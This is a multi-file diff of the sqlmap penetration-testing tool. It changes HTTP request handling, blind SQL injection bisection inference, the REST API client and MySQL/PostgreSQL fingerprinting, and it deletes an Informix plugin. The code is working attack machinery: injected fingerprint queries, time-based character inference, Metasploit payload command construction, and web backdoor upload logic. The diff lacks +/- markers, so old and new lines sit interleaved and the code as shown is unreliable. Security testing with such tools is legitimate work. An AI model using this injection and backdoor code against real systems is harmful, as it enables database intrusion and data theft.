from lib.core.enums import PLACE
@@ -137,7 +136,6 @@ def parseResponse(page, headers):
if page:
htmlParser(page)
@cachedmethod
def checkCharEncoding(encoding, warn=True):
"""
Checks encoding name, repairs common misspellings and adjusts to
@@ -232,10 +230,7 @@ def getHeuristicCharEncoding(page):
Returns page encoding charset detected by usage of heuristics
Reference: http://chardet.feedparser.org/docs/
"""
key = hash(page)
retVal = kb.cache.encoding.get(key) or detect(page)["encoding"]
kb.cache.encoding[key] = retVal
retVal = detect(page)["encoding"]
if retVal:
infoMsg = "heuristics detected web page charset '%s'" % retVal
@@ -341,8 +336,6 @@ def processResponse(page, responseHeaders):
if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,):
kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page)
else:
kb.tableFrom = None
if conf.parseErrors:
msg = extractErrorMessage(page)
@@ -358,11 +351,7 @@ def processResponse(page, responseHeaders):
if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]:
if conf.paramDict[PLACE.POST][name] in page:
continue
else:
msg = "do you want to automatically adjust the value of '%s'? [y/N]" % name
if readInput(msg, default='N').strip().upper() != 'Y':
continue
conf.paramDict[PLACE.POST][name] = value
conf.paramDict[PLACE.POST][name] = value
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""):

View File

@@ -26,7 +26,6 @@ from lib.core.settings import MAX_RATIO
from lib.core.settings import REFLECTED_VALUE_MARKER
from lib.core.settings import LOWER_RATIO_BOUND
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.settings import URI_HTTP_HEADER
from lib.core.threads import getCurrentThreadData
def comparison(page, headers, code=None, getRatioValue=False, pageLength=None):
@@ -49,15 +48,18 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
threadData = getCurrentThreadData()
if kb.testMode:
threadData.lastComparisonHeaders = listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else ""
threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else ""
threadData.lastComparisonPage = page
threadData.lastComparisonCode = code
if page is None and pageLength is None:
return None
seqMatcher = threadData.seqMatcher
seqMatcher.set_seq1(kb.pageTemplate)
if any((conf.string, conf.notString, conf.regexp)):
rawResponse = "%s%s" % (listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else "", page)
rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page)
# String to match in page when the query is True and/or valid
if conf.string:
@@ -75,9 +77,6 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
if conf.code:
return conf.code == code
seqMatcher = threadData.seqMatcher
seqMatcher.set_seq1(kb.pageTemplate)
if page:
# In case of an DBMS error page return None
if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic:

View File

@@ -90,7 +90,6 @@ from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
from lib.core.settings import MAX_CONNECTIONS_REGEX
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
from lib.core.settings import MAX_MURPHY_SLEEP_TIME
from lib.core.settings import META_REFRESH_REGEX
from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import IS_WIN
@@ -111,6 +110,7 @@ from lib.request.basic import processResponse
from lib.request.direct import direct
from lib.request.comparison import comparison
from lib.request.methodrequest import MethodRequest
from thirdparty.multipart import multipartpost
from thirdparty.odict.odict import OrderedDict
from thirdparty.socks.socks import ProxyError
@@ -225,10 +225,8 @@ class Connect(object):
if conf.offline:
return None, None, None
elif conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0:
if conf.murphyRate:
time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1))
return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None if not conf.murphyRate else randomInt(3)
elif conf.dummy:
return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None
threadData = getCurrentThreadData()
with kb.locks.request:
@@ -244,7 +242,7 @@ class Connect(object):
referer = kwargs.get("referer", None) or conf.referer
host = kwargs.get("host", None) or conf.host
direct_ = kwargs.get("direct", False)
multipart = kwargs.get("multipart", None)
multipart = kwargs.get("multipart", False)
silent = kwargs.get("silent", False)
raise404 = kwargs.get("raise404", True)
timeout = kwargs.get("timeout", None) or conf.timeout
@@ -256,9 +254,6 @@ class Connect(object):
crawling = kwargs.get("crawling", False)
skipRead = kwargs.get("skipRead", False)
if multipart:
post = multipart
websocket_ = url.lower().startswith("ws")
if not urlparse.urlsplit(url).netloc:
@@ -303,6 +298,20 @@ class Connect(object):
params = urlencode(params)
url = "%s?%s" % (url, params)
elif multipart:
# Needed in this form because of potential circle dependency
# problem (option -> update -> connect -> option)
from lib.core.option import proxyHandler
multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler)
conn = multipartOpener.open(unicodeencode(url), multipart)
page = Connect._connReadProxy(conn) if not skipRead else None
responseHeaders = conn.info()
responseHeaders[URI_HTTP_HEADER] = conn.geturl()
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
return page
elif any((refreshing, crawling)):
pass
@@ -355,7 +364,7 @@ class Connect(object):
if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
@@ -406,7 +415,7 @@ class Connect(object):
responseHeaders = _(ws.getheaders())
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
requestMsg += "\n%s" % requestHeaders
if post is not None:
@@ -425,7 +434,7 @@ class Connect(object):
else:
req = urllib2.Request(url, post, headers)
requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
conf.cj._policy._now = conf.cj._now = int(time.time())
@@ -446,10 +455,9 @@ class Connect(object):
requestMsg += "\n"
if not multipart:
threadData.lastRequestMsg = requestMsg
threadData.lastRequestMsg = requestMsg
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
if conf.cj:
for cookie in conf.cj:
@@ -559,7 +567,7 @@ class Connect(object):
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
@@ -570,8 +578,7 @@ class Connect(object):
elif conf.verbose > 5:
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
if not multipart:
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
if ex.code == httplib.UNAUTHORIZED and not conf.ignore401:
errMsg = "not authorized, try to provide right HTTP "
@@ -694,7 +701,7 @@ class Connect(object):
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
if not skipLogTraffic:
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
@@ -704,8 +711,7 @@ class Connect(object):
elif conf.verbose > 5:
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
if not multipart:
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
return page, responseHeaders, code
@@ -1076,7 +1082,7 @@ class Connect(object):
dataToStdout(" (done)\n")
elif not kb.testMode:
warnMsg = "it is very important to not stress the network connection "
warnMsg = "it is very important to not stress the network adapter "
warnMsg += "during usage of time-based payloads to prevent potential "
warnMsg += "disruptions "
singleTimeWarnMessage(warnMsg)
@@ -1143,7 +1149,6 @@ class Connect(object):
threadData.lastQueryDuration = calculateDeltaSeconds(start)
threadData.lastPage = page
threadData.lastCode = code
kb.originalCode = kb.originalCode or code

View File

@@ -87,9 +87,8 @@ class HTTPSConnection(httplib.HTTPSConnection):
if not success:
errMsg = "can't establish SSL connection"
# Reference: https://docs.python.org/2/library/ssl.html
if distutils.version.LooseVersion(PYVERSION) < distutils.version.LooseVersion("2.7.9"):
errMsg += " (please retry with Python >= 2.7.9)"
if distutils.version.LooseVersion(PYVERSION) < distutils.version.LooseVersion("2.7.10"):
errMsg += " (please retry with Python >= 2.7.10)"
raise SqlmapConnectionException(errMsg)
class HTTPSHandler(urllib2.HTTPSHandler):

View File

@@ -429,12 +429,10 @@ class Metasploit:
self._payloadCmd += " X > \"%s\"" % outFile
else:
if extra == "BufferRegister=EAX":
self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format)
self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile)
if extra is not None:
self._payloadCmd += " %s" % extra
self._payloadCmd += " > \"%s\"" % outFile
else:
self._payloadCmd += " -f exe > \"%s\"" % outFile

View File

@@ -116,7 +116,7 @@ class Web:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE
page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = "unable to upload the file through the web file "
@@ -200,15 +200,6 @@ class Web:
directories.extend(getAutoDirectories())
directories = list(oset(directories))
path = urlparse.urlparse(conf.url).path or '/'
if path != '/':
_ = []
for directory in directories:
_.append(directory)
if not directory.endswith(path):
_.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))
directories = _
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))

View File

@@ -41,7 +41,7 @@ from lib.core.settings import INFERENCE_GREATER_CHAR
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
from lib.core.settings import MAX_BISECTION_LENGTH
from lib.core.settings import MAX_REVALIDATION_STEPS
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
from lib.core.settings import NULL
from lib.core.settings import PARTIAL_HEX_VALUE_MARKER
from lib.core.settings import PARTIAL_VALUE_MARKER
@@ -66,7 +66,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
finalValue = None
retrievedLength = 0
asciiTbl = getCharset(charsetType)
threadData = getCurrentThreadData()
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
retVal = hashDBRetrieve(expression, checkConf=True)
@@ -144,7 +143,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
length = None
showEta = conf.eta and isinstance(length, int)
numThreads = min(conf.threads, length) or 1
numThreads = min(conf.threads, length)
if showEta:
progress = ProgressBar(maxValue=length)
@@ -198,7 +197,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
def validateChar(idx, value):
"""
Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay
Used in time-based inference (in case that original and retrieved
value are not equal there will be a deliberate delay).
"""
if "'%s'" % CHAR_INFERENCE_MARK not in payload:
@@ -209,17 +209,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value))
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
if result and timeBasedCompare:
result = threadData.lastCode == kb.injection.data[kb.technique].trueCode
if not result:
warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, kb.injection.data[kb.technique].trueCode)
singleTimeWarnMessage(warnMsg)
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
return result
return not result
def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None):
"""
@@ -261,44 +254,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
maxChar = maxValue = charTbl[-1]
minChar = minValue = charTbl[0]
firstCheck = False
lastCheck = False
unexpectedCode = False
while len(charTbl) != 1:
position = None
if charsetType is None:
if not firstCheck:
try:
try:
lastChar = [_ for _ in threadData.shared.value if _ is not None][-1]
except IndexError:
lastChar = None
if 'a' <= lastChar <= 'z':
position = charTbl.index(ord('a') - 1) # 96
elif 'A' <= lastChar <= 'Z':
position = charTbl.index(ord('A') - 1) # 64
elif '0' <= lastChar <= '9':
position = charTbl.index(ord('0') - 1) # 47
except ValueError:
pass
finally:
firstCheck = True
elif not lastCheck and numThreads == 1: # not usable in multi-threading environment
if charTbl[(len(charTbl) >> 1)] < ord(' '):
try:
# favorize last char check if current value inclines toward 0
position = charTbl.index(1)
except ValueError:
pass
finally:
lastCheck = True
if position is None:
position = (len(charTbl) >> 1)
position = (len(charTbl) >> 1)
posValue = charTbl[position]
falsePayload = None
@@ -321,12 +279,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
if not timeBasedCompare:
unexpectedCode |= threadData.lastCode not in (kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode)
if unexpectedCode:
warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode
singleTimeWarnMessage(warnMsg)
if result:
minValue = posValue
@@ -366,25 +318,24 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
retVal = minValue + 1
if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload):
if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal):
if timeBasedCompare and not validateChar(idx, retVal):
if not kb.originalTimeDelay:
kb.originalTimeDelay = conf.timeSec
threadData.validationRun = 0
if retried < MAX_REVALIDATION_STEPS:
kb.timeValidCharsRun = 0
if retried < MAX_TIME_REVALIDATION_STEPS:
errMsg = "invalid character detected. retrying.."
logger.error(errMsg)
if timeBasedCompare:
if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
conf.timeSec += 1
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
logger.warn(warnMsg)
if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
conf.timeSec += 1
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
logger.warn(warnMsg)
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
dbgMsg = "turning off time auto-adjustment mechanism"
logger.debug(dbgMsg)
kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
dbgMsg = "turning off time auto-adjustment mechanism"
logger.debug(dbgMsg)
kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO
return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1)
else:
@@ -394,8 +345,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
return decodeIntToUnicode(retVal)
else:
if timeBasedCompare:
threadData.validationRun += 1
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD:
kb.timeValidCharsRun += 1
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD:
dbgMsg = "turning back on time auto-adjustment mechanism"
logger.debug(dbgMsg)
kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES
@@ -425,6 +376,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# Go multi-threading (--threads > 1)
if conf.threads > 1 and isinstance(length, int) and length > 1:
threadData = getCurrentThreadData()
threadData.shared.value = [None] * length
threadData.shared.index = [firstChar] # As list for python nested function scoping
threadData.shared.start = firstChar
@@ -523,7 +476,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# No multi-threading (--threads = 1)
else:
index = firstChar
threadData.shared.value = ""
while True:
index += 1
@@ -599,7 +551,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if kb.data.processChar:
val = kb.data.processChar(val)
threadData.shared.value = partialValue = partialValue + val
partialValue += val
if showEta:
progress.progress(time.time() - charStart, index)

View File

@@ -224,7 +224,7 @@ class StdDbOut(object):
# Ignore all non-relevant messages
return
output = conf.databaseCursor.execute(
output = conf.database_cursor.execute(
"SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?",
(self.taskid, content_type))
@@ -232,25 +232,25 @@ class StdDbOut(object):
if status == CONTENT_STATUS.COMPLETE:
if len(output) > 0:
for index in xrange(len(output)):
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?",
conf.database_cursor.execute("DELETE FROM data WHERE id = ?",
(output[index][0],))
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
(self.taskid, status, content_type, jsonize(value)))
if kb.partRun:
kb.partRun = None
elif status == CONTENT_STATUS.IN_PROGRESS:
if len(output) == 0:
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
(self.taskid, status, content_type,
jsonize(value)))
else:
new_value = "%s%s" % (dejsonize(output[0][2]), value)
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?",
conf.database_cursor.execute("UPDATE data SET value = ? WHERE id = ?",
(jsonize(new_value), output[0][0]))
else:
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
(self.taskid, str(value) if value else ""))
def flush(self):
@@ -269,7 +269,7 @@ class LogRecorder(logging.StreamHandler):
Record emitted events to IPC database for asynchronous I/O
communication with the parent process
"""
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
(conf.taskid, time.strftime("%X"), record.levelname,
record.msg % record.args if record.args else record.msg))
@@ -277,8 +277,8 @@ class LogRecorder(logging.StreamHandler):
def setRestAPILog():
if hasattr(conf, "api"):
try:
conf.databaseCursor = Database(conf.database)
conf.databaseCursor.connect("client")
conf.database_cursor = Database(conf.database)
conf.database_cursor.connect("client")
except sqlite3.OperationalError, ex:
raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database)
@@ -722,8 +722,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
while True:
try:
command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip()
command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command)
command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip().lower()
except (EOFError, KeyboardInterrupt):
print
break

View File

@@ -44,8 +44,6 @@ def checkDependencies():
elif dbmsName == DBMS.HSQLDB:
import jaydebeapi
import jpype
elif dbmsName == DBMS.INFORMIX:
import ibm_db_dbi
except ImportError:
warnMsg = "sqlmap requires '%s' third-party library " % data[1]
warnMsg += "in order to directly connect to the DBMS "

View File

@@ -85,9 +85,3 @@ class xrange(object):
def _index(self, i):
return self.start + self.step * i
def index(self, i):
if self.start <= i < self.stop:
return i - self.start
else:
raise ValueError("%d is not in list" % i)

View File

@@ -1,34 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import DBMS
from lib.core.settings import INFORMIX_SYSTEM_DBS
from lib.core.unescaper import unescaper
from plugins.dbms.informix.enumeration import Enumeration
from plugins.dbms.informix.filesystem import Filesystem
from plugins.dbms.informix.fingerprint import Fingerprint
from plugins.dbms.informix.syntax import Syntax
from plugins.dbms.informix.takeover import Takeover
from plugins.generic.misc import Miscellaneous
class InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
"""
This class defines Informix methods
"""
def __init__(self):
self.excludeDbsList = INFORMIX_SYSTEM_DBS
Syntax.__init__(self)
Fingerprint.__init__(self)
Enumeration.__init__(self)
Filesystem.__init__(self)
Miscellaneous.__init__(self)
Takeover.__init__(self)
unescaper[DBMS.INFORMIX] = Syntax.escape

View File

@@ -1,63 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
try:
import ibm_db_dbi
except ImportError:
pass
import logging
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector):
"""
Homepage: http://code.google.com/p/ibm-db/
User guide: http://code.google.com/p/ibm-db/wiki/README
API: http://www.python.org/dev/peps/pep-0249/
License: Apache License 2.0
"""
def __init__(self):
GenericConnector.__init__(self)
def connect(self):
self.initConnection()
try:
database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port)
self.connector = ibm_db_dbi.connect(database, self.user, self.password)
except ibm_db_dbi.OperationalError, msg:
raise SqlmapConnectionException(msg)
self.initCursor()
self.printConnected()
def fetchall(self):
try:
return self.cursor.fetchall()
except ibm_db_dbi.ProgrammingError, msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
return None
def execute(self, query):
try:
self.cursor.execute(query)
except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
except ibm_db_dbi.InternalError, msg:
raise SqlmapConnectionException(msg[1])
self.connector.commit()
def select(self, query):
self.execute(query)
return self.fetchall()

View File

@@ -1,12 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration):
def __init__(self):
GenericEnumeration.__init__(self)

View File

@@ -1,12 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)

View File

@@ -1,105 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import INFORMIX_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
def __init__(self):
GenericFingerprint.__init__(self, DBMS.INFORMIX)
def getFingerprint(self):
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
if not conf.extensiveFp:
value += DBMS.INFORMIX
return value
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(INFORMIX_ALIASES) or (conf.dbms or "").lower() in INFORMIX_ALIASES):
setDbms(DBMS.INFORMIX)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)")
if result:
infoMsg = "confirming %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression("(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False
setDbms(DBMS.INFORMIX)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX
logger.info(infoMsg)
for version in ("12.1", "11.7", "11.5"):
output = inject.checkBooleanExpression("EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION,'FULL') LIKE '%%%s%%')" % version)
if output:
Backend.setVersion(version)
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False

View File

@@ -1,24 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax):
def __init__(self):
GenericSyntax.__init__(self)
@staticmethod
def escape(expression, quote=True):
"""
>>> Syntax.escape("SELECT 'abcdefgh' FROM foobar")
'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar'
"""
def escaper(value):
return "||".join("CHR(%d)" % ord(_) for _ in value)
return Syntax._escape(expression, quote, escaper)

View File

@@ -1,15 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover):
def __init__(self):
self.__basedir = None
self.__datadir = None
GenericTakeover.__init__(self)

View File

@@ -49,9 +49,9 @@ class Fingerprint(GenericFingerprint):
(50000, 50092), # MySQL 5.0
(50100, 50172), # MySQL 5.1
(50400, 50404), # MySQL 5.4
(50500, 50552), # MySQL 5.5
(50600, 50633), # MySQL 5.6
(50700, 50715), # MySQL 5.7
(50500, 50549), # MySQL 5.5
(50600, 50630), # MySQL 5.6
(50700, 50712), # MySQL 5.7
(60000, 60014), # MySQL 6.0
)

View File

@@ -97,16 +97,8 @@ class Fingerprint(GenericFingerprint):
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)
if inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
Backend.setVersion(">= 9.5.0")
elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
Backend.setVersionList([">= 9.3.0", "< 9.4.0"])
elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"):
Backend.setVersionList([">= 9.2.0", "< 9.3.0"])
